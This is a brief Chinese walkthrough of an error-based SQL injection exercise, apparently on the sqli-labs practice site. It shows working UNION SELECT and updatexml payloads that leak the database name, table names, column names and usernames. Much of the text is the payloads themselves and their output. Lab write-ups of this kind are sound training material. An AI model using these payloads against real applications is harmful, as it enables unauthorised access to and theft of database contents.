点开网址,首先看到一个页面,首先尝试闭合字符
id=1 报错
id=1‘ 报错
id=1"成功
然后开始爆字段?id=1" order by 3 --+
发现有三个字段然后查询显示位
发现并没有显示位
只能尝试一下报错注入用到的函数是?id=1" union select 1,updatexml(1,concat(0x7e,database()),1),3 --+
查询到的数据库名字为·
然后查询他的数据库版本为5.0以上的版本
查询到了数据库然后我们就要去查询一下他的表名,?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
查询到的表名~emails,referers,uagents,users'
然后我们就要去查询他的表名下面的列名?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='uagents')),1)--+
查询到的列名为id,uagent,ip_address,username'
?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(username) from users)),1) --+
查询到列名之后,查询列名下面的数据,查询到的数据为
数据为
'~Dumb,Angelina,Dummy,secure,stup'
